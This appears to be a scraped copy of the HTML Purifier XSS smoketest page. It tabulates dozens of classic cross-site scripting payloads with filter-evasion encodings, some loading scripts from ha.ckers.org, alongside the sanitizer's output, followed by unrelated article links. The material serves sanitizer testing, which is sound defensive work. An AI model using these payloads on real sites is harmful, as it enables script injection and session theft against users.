HTML Purifier XSS Attacks Smoketest

Test

Name	Raw	Output	Render
XSS Locator	`';alert(String.fromCharCode( » 88,83,83))//\';alert(String. » fromCharCode(88,83,83))//";a » lert(String.fromCharCode(88, » 83,83))//\";alert(String.fro » mCharCode(88,83,83))//--></S » CRIPT>">'><SCRIPT>alert(Stri » ng.fromCharCode(88,83,83))</ » SCRIPT>=&{}`	`';alert(String.fromCharCode( » 88,83,83))//\';alert(String. » fromCharCode(88,83,83))//";a » lert(String.fromCharCode(88, » 83,83))//\";alert(String.fro » mCharCode(88,83,83))//--> » ">'>=&{}`	';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}
XSS Quick Test	`'';!--"<XSS>=&{()}`	`'';!--"=&{()}`	'';!--"=&{()}
SCRIPT w/Alert()	`<SCRIPT>alert('XSS')</SCRIPT » >`
SCRIPT w/Source File	`<SCRIPT » SRC=http://ha.ckers.org/xss. » js></SCRIPT>`
SCRIPT w/Char Code	`<SCRIPT>alert(String.fromCha » rCode(88,83,83))</SCRIPT>`
BASE	`<BASE » HREF="javascript:alert('XSS' » );//">`
BGSOUND	`<BGSOUND » SRC="javascript:alert('XSS') » ;">`
BODY background-image	`<BODY » BACKGROUND="javascript:alert » ('XSS');">`
BODY ONLOAD	`<BODY ONLOAD=alert('XSS')>`
DIV background-image 1	`<DIV » STYLE="background-image: » url(javascript:alert('XSS')) » ">`	`<div></div>`
DIV background-image 2	`<DIV » STYLE="background-image: » url(javascript:alert('XS » S'))">`	`<div></div>`
DIV expression	`<DIV STYLE="width: » expression(alert('XSS'));">`	`<div></div>`
FRAME	`<FRAMESET><FRAME » SRC="javascript:alert('XSS') » ;"></FRAMESET>`
IFRAME	`<IFRAME » SRC="javascript:alert('XSS') » ;"></IFRAME>`
INPUT Image	`<INPUT TYPE="IMAGE" » SRC="javascript:alert('XSS') » ;">`
IMG w/JavaScript Directive	`<IMG » SRC="javascript:alert('XSS') » ;">`
IMG No Quotes/Semicolon	`<IMG » SRC=javascript:alert('XSS')>`
IMG Dynsrc	`<IMG » DYNSRC="javascript:alert('XS » S');">`
IMG Lowsrc	`<IMG » LOWSRC="javascript:alert('XS » S');">`
IMG Embedded commands 1	`<IMG » SRC="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode">`	`<img » src="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode" » alt="somecommand.php?somevar » iables=maliciouscode" />`	HTML Purifier XSS Attacks Smoketest
IMG STYLE w/expression	`exp/<XSS » STYLE='no\xss:noxss("//"); » xss:ex/XSS///* » /pression(alert("XSS"))'>`	`exp/*`	exp/*
List-style-image	`<STYLE>li {list-style-image: » url("javascript:alert('XSS') » ");}</STYLE><UL><LI>XSS`	`<ul><li>XSS</li></ul>`	XSS
IMG w/VBscript	`<IMG » SRC='vbscript:msgbox("XSS")' » >`
LAYER	`<LAYER » SRC="http://ha.ckers.org/scr » iptlet.html"></LAYER>`
Livescript	`<IMG » SRC="livescript:[code]">`
US-ASCII encoding	`scriptalert(XSS)/script »`	`scriptalert(XSS)/script`	scriptalert(XSS)/script
META	`<META HTTP-EQUIV="refresh" » CONTENT="0;url=javascript:al » ert('XSS');">`
META w/data:URL	`<META HTTP-EQUIV="refresh" » CONTENT="0;url=data:text/htm <span >» l;base64,PHNjcmlwdD5hbGVydCg » nWFNTJyk8L3NjcmlwdD4K">`
META w/additional URL parameter	`<META HTTP-EQUIV="refresh" » CONTENT="0; » URL=http://;URL=javascript:a » lert('XSS');">`
Mocha	`<IMG SRC="mocha:[code]">`
OBJECT	`<OBJECT » TYPE="text/x-scriptlet" » DATA="http://ha.ckers.org/sc » riptlet.html"></OBJECT>`
OBJECT w/Embedded XSS	`<OBJECT » classid=clsid:ae24fdae-03c6- » 11d1-8b76-0080c744f389><para » m name=url » value=javascript:alert('XSS' » )></OBJECT>`
Embed Flash	`<EMBED » SRC="http://ha.ckers.org/xss » .swf" » AllowScriptAccess="always">< » /EMBED>`
STYLE	`<STYLE » TYPE="text/javascript">alert » ('XSS');</STYLE>`
STYLE w/Comment	`<IMG » STYLE="xss:expr/XSS/ession » (alert('XSS'))">`
STYLE w/Anonymous HTML	`<XSS » STYLE="xss:expression(alert( » 'XSS'))">`
STYLE w/background-image	`<STYLE>.XSS{background-image » :url("javascript:alert('XSS' » )");}</STYLE><A » CLASS=XSS></A>`	`<a class="XSS"></a>`
STYLE w/background	`<STYLE » type="text/css">BODY{backgro » und:url("javascript:alert('X » SS')")}</STYLE>`
Stylesheet	`<LINK REL="stylesheet" » HREF="javascript:alert('XSS' » );">`
Remote Stylesheet 1	`<LINK REL="stylesheet" » HREF="http://ha.ckers.org/xs » s.css">`
Remote Stylesheet 2	`<STYLE>@import'http://ha.cke » rs.org/xss.css';</STYLE>`
Remote Stylesheet 3	`<META HTTP-EQUIV="Link" » Content="<http://ha.ckers.or » g/xss.css>; REL=stylesheet">`
Remote Stylesheet 4	`<STYLE>BODY{-moz-binding:url » ("http://ha.ckers.org/xssmoz » .xml#xss")}</STYLE>`
TABLE	`<TABLE » BACKGROUND="javascript:alert » ('XSS')"></TABLE>`
TD	`<TABLE><TD » BACKGROUND="javascript:alert » ('XSS')"></TD></TABLE>`
XML namespace	`<HTML xmlns:xss> <?import » namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> <xss:xss>X » SS</xss:xss> </HTML>`	`<?import namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> XSS`	<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> XSS
XML data island w/CDATA	`<XML » ID=I><X><C><![CDATA[<IMG » SRC="javas]]><![CDATA[cript: » alert('XSS');">]]> </C></X> » </xml><SPAN DATASRC=#I » DATAFLD=C DATAFORMATAS=HTML>`	`<IMG » SRC="javascript:alert('XSS') » ;"> <span></span>`	<IMG SRC="javascript:alert('XSS');">
XML data island w/comment	`<XML ID="xss"><I><B><IMG » SRC="javas<!-- » -->cript:alert('XSS')"></B>< » /I></XML> <SPAN » DATASRC="#xss" DATAFLD="B" » DATAFORMATAS="HTML"></SPAN>`	`<i><b><img src="javas" » alt="javas<!-- » -->cript:alert('XSS')" » /></b></i><span></span>`	HTML Purifier XSS Attacks Smoketest
XML (locally hosted)	`<XML » SRC="http://ha.ckers.org/xss » test.xml" ID=I></XML> <SPAN » DATASRC=#I DATAFLD=C » DATAFORMATAS=HTML></SPAN>`	`<span></span>`
XML HTML+TIME	`<HTML><BODY> <?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2"> <t:set » attributeName="innerHTML" » to="XSS<SCRIPT » DEFER>alert('XSS')</SCRIPT>" » > </BODY></HTML>`	`<?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2">`	<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2">
Commented-out Block	`<!--[if gte IE » 4]> <SCRIPT>alert('XSS');</S » CRIPT> <![endif]-->`
Cookie Manipulation	`<META » HTTP-EQUIV="Set-Cookie" » Content="USERID=<SCRIPT>aler » t('XSS')</SCRIPT>">`
Local .htc file	`<XSS STYLE="behavior: » url(http://ha.ckers.org/xss. » htc);">`
Rename .js to .jpg	`<SCRIPT » SRC="http://ha.ckers.org/xss » .jpg"></SCRIPT>`
SSI	`<!--#exec cmd="/bin/echo » '<SCRIPT SRC'"--><!--#exec » cmd="/bin/echo » '=http://ha.ckers.org/xss.js » ></SCRIPT>'"-->`
PHP	`<? » echo('<SCR)'; echo('IPT>aler » t("XSS")</SCRIPT>'); ?>`	`<? echo('alert("XSS")'); » ?>`	<? echo('alert("XSS")'); ?>
JavaScript Includes	`<BR SIZE="&{alert('XSS')}">`	`<br />`
Character Encoding Example	< %3C &lt < &LT &LT; &#60 » &#060 &#0060 &#00060 &#000 » 060 &#0000060 < < & » #0060; < < &# » 0000060; &#x3c &#x03c &#x003 » c &#x0003c &#x00003c &#x0000 » 03c < < < » < < &#x000 » 003c; &#X3c &#X03c &#X003c & » #X0003c &#X00003c &#X000003c » &#X3c; &#X03c; &#X003c; &#X » 0003c; &#X00003c; &#X000003c » ; &#x3C &#x03C &#x003C &#x0 » 003C &#x00003C &#x000003C &# » x3C; < < &#x000 » 3C; < &#x000003C; & » #X3C &#X03C &#X003C &#X0003C » &#X00003C &#X000003C &#X3C » ; &#X03C; &#X003C; &#X0003C; » &#X00003C; &#X000003C; \x3c » \x3C \u003c \u003C	`< %3C &lt < &L » T &LT; < < < & » lt; < < < < < » < < < < < &l » t; < < < < < » < < < < < &l » t; < < < < < » < < < < < &lt » ; < < < < < » < < < < < &lt » ; < < < < < & » lt; < < < < &lt » ; < \x3c \x3C \u003c \u00 » 3C`	< %3C &lt < &LT &LT; < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C
Case Insensitive	`<IMG » SRC=JaVaScRiPt:alert('XSS')>`
HTML Entities	`<IMG » SRC=javascript:alert("X » SS")>`
Grave Accents	<IMG » SRC=`javascript:alert("RSnak » e says, 'XSS'")`>	<img » src="%60javascript%3Aalert(" » alt="`javascript:alert(&quot » ;RSnake" />
Image w/CharCode	`<IMG » SRC=javascript:alert(String. » fromCharCode(88,83,83))>`
UTF-8 Unicode Encoding	`<IMG » SRC=java&# » 115;crip& » #116;:ale& » #114;t('X&# » 83;S')>`
Long UTF-8 Unicode w/out Semicolons	`<IMG » SRC=&#0000106&#0000097&#0000 » 118&#0000097&#0000115&#00000 » 99&#0000114&#0000105&#000011 » 2&#0000116&#0000058&#0000097 » &#0000108&#0000101&#0000114& » #0000116&#0000040&#0000039&# » 0000088&#0000083&#0000083&#0 » 000039&#0000041>`
DIV w/Unicode	`<DIV » STYLE="background-image:\007 » 5\0072\006C\0028'\006a\0061\ » 0076\0061\0073\0063\0072\006 » 9\0070\0074\003a\0061\006c\0 » 065\0072\0074\0028.1027\0058 » .1053\0053\0027\0029'\0029">`	`<div></div>`
Hex Encoding w/out Semicolons	`<IMG » SRC=&#x6A&#x61&#x76&#x61&#x7 » 3&#x63&#x72&#x69&#x70&#x74&# » x3A&#x61&#x6C&#x65&#x72&#x74 » &#x28&#x27&#x58&#x53&#x53&#x » 27&#x29>`
UTF-7 Encoding	`<HEAD><META » HTTP-EQUIV="CONTENT-TYPE" » CONTENT="text/html; » charset=UTF-7"> » </HEAD>+ADw-SCRIPT+AD4-alert » ('XSS');+ADw-/SCRIPT+AD4-`	`+ADw-SCRIPT+AD4-alert('XSS') » ;+ADw-/SCRIPT+AD4-`	+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
Escaping JavaScript escapes	`\";alert('XSS');//`	`\";alert('XSS');//`	\";alert('XSS');//
End title tag	`</TITLE><SCRIPT>alert("XSS") » ;</SCRIPT>`
STYLE w/broken up JavaScript	`<STYLE>@im\port'\ja\vasc\rip » t:alert("XSS")';</STYLE>`
Embedded Tab	`<IMG » SRC="jav\tascript:alert('XSS' » );">`	`<img » src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />`	HTML Purifier XSS Attacks Smoketest
Embedded Encoded Tab	`<IMG » SRC="jav ascript:alert( » 'XSS');">`	`<img » src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />`	HTML Purifier XSS Attacks Smoketest
Embedded Newline	`<IMG » SRC="jav ascript:alert( » 'XSS');">`	`<img » src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />`	HTML Purifier XSS Attacks Smoketest
Embedded Carriage Return	`<IMG » SRC="jav ascript:alert( » 'XSS');">`	`<img » src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />`	HTML Purifier XSS Attacks Smoketest
Multiline w/Carriage Returns	`<IMG SRC = " j a v a s c r i » p t : a l e r t ( ' X S S ' » ) " >`	`<img » src="j%20a%20v%20a%20s%20c%2 » 0r%20i%20p%20t%20%3A%20a%20l » %20e%20r%20t%20(%20'%20X%20S » %20S%20'%20)" alt="j a v a s » c r i p t : a l e r t ( ' X » S S ' )" />`	HTML Purifier XSS Attacks Smoketest
Null Chars 1	`<IMG » SRC=java\0script:alert("XSS") » >`
Null Chars 2	`&<SCR\0IPT>alert("XSS")</SCR\0 » IPT>`	`&`	&
Spaces/Meta Chars	`<IMG SRC=" » javascript:alert('XSS');">`	`<img src="" alt="" />`	HTML Purifier XSS Attacks Smoketest
Non-Alpha/Non-Digit	`<SCRIPT/XSS » SRC="http://ha.ckers.org/xss » .js"></SCRIPT>`
Non-Alpha/Non-Digit Part 2	<BODY » onload!#$%&()*~+-_.,:;?@[/\|\ » ]^`=alert("XSS")>
No Closing Script Tag	`<SCRIPT » SRC=http://ha.ckers.org/xss. » js`
Protocol resolution in script tags	`<SCRIPT » SRC=//ha.ckers.org/.j>`
Half-Open HTML/JavaScript	`<IMG » SRC="javascript:alert('XSS') » "`
Double open angle brackets	`<IFRAME » SRC=http://ha.ckers.org/scri » ptlet.html <`
Extraneous Open Brackets	`<<SCRIPT>alert("XSS");//<</S » CRIPT>`	`<`	<
Malformed IMG Tags	`<IMG » """><SCRIPT>alert("XSS")</SC » RIPT>">`	`">`	">
No Quotes/Semicolons	`<SCRIPT>a=/XSS/ alert(a.sour » ce)</SCRIPT>`
Evade Regex Filter 1	`<SCRIPT a=">" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT>`
Evade Regex Filter 2	`<SCRIPT ="blah" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT>`
Evade Regex Filter 3	`<SCRIPT a="blah" '' » SRC="http://ha.ckers.org/xss » .js"></SCRIPT>`
Evade Regex Filter 4	`<SCRIPT "a='>'" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT>`
Evade Regex Filter 5	<SCRIPT a=`>` » SRC="http://ha.ckers.org/xss » .js"></SCRIPT>
Filter Evasion 1	`<SCRIPT>document.write("<SCR » I");</SCRIPT>PT » SRC="http://ha.ckers.org/xss » .js"></SCRIPT>`	`PT » SRC="http://ha.ckers.org/xss » .js">`	PT SRC="http://ha.ckers.org/xss.js">
Filter Evasion 2	`<SCRIPT a=">'>" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT>`
IP Encoding	`<A » HREF="http://66.102.7.147/"> » XSS</A>`	`<a » href="http://66.102.7.147/"> » XSS</a>`
URL Encoding	`<A » HREF="http://%77%77%77%2E%67 » %6F%6F%67%6C%65%2E%63%6F%6D" » >XSS</A>`	`<a>XSS</a>`
Dword Encoding	`<A » HREF="http://1113982867/">XS » S</A>`	`<a » href="http://1113982867/">XS » S</a>`
Hex Encoding	`<A » HREF="http://0x42.0x0000066. » 0x7.0x93/">XSS</A>`	`<a » href="http://0x42.0x0000066. » 0x7.0x93/">XSS</a>`
Octal Encoding	`<A » HREF="http://0102.0146.0007. » 00000223/">XSS</A>`	`<a » href="http://0102.0146.0007. » 00000223/">XSS</a>`
Mixed Encoding	`<A » HREF="h tt\tp://6 6.00014 » 6.0x7.147/">XSS</A>`	`<a » href="h%20tt%20p%3A//6%206.0 » 00146.0x7.147/">XSS</a>`
Protocol Resolution Bypass	`<A » HREF="//www.google.com/">XSS » </A>`	`<a>XSS</a>`
Firefox Lookups 1	`<A HREF="//google">XSS</A>`	`<a href="//google">XSS</a>`
Firefox Lookups 2	`<A » HREF="http://ha.ckers.org@go » ogle">XSS</A>`	`<a » href="http://google">XSS</a>`
Firefox Lookups 3	`<A » HREF="http://google:ha.ckers » .org">XSS</A>`	`<a » href="http://google">XSS</a>`
Removing Cnames	`<A » HREF="http://google.com/">XS » S</A>`	`<a>XSS</a>`
Extra dot for Absolute DNS	`<A » HREF="http://www.google.com. » /">XSS</A>`	`<a>XSS</a>`
JavaScript Link Location	`<A » HREF="javascript:document.lo » cation='http://www.google.co » m/'">XSS</A>`	`<a>XSS</a>`
Content Replace	`<A » HREF="http://www.gohttp://ww » w.google.com/ogle.com/">XSS< » /A>`	`<a » href="http://www.gohttp//www » .google.com/ogle.com/">XSS</ » a>`

HTML Purifier XSS Attacks Smoketest

Test

繼續閱讀

Java String.format方法的簡單使用

/\B(?=(?:\d{3})+$)/g 一條令人費解的正規表達式

neo4j之cypher使用文檔

适用于JavaScript的ECMAScript 2020規範向前發展

GitHub連夜封殺！這份阿裡 10W 字内部 Java 字面試手冊到底有多強？

spark/scala關于【資源檔案】加載方法概述外部檔案加載方案測試資源檔案打包入jar包中小結

mybatis_入門程式Mybatis入門

JS生成uuid的四種方法

AOP程式設計_Android優雅權限架構(1)概念基礎，2021金三銀四前言正文大綱正文

Effective Java 8:通用程式設計

OOM三種類型

工廠模式-三種類型

【遞歸】高效率求2的n次幂

layui多任務上傳添加進度條

win10本地scala和spark安裝安裝scala安裝spark

scala (3) Function 和 Method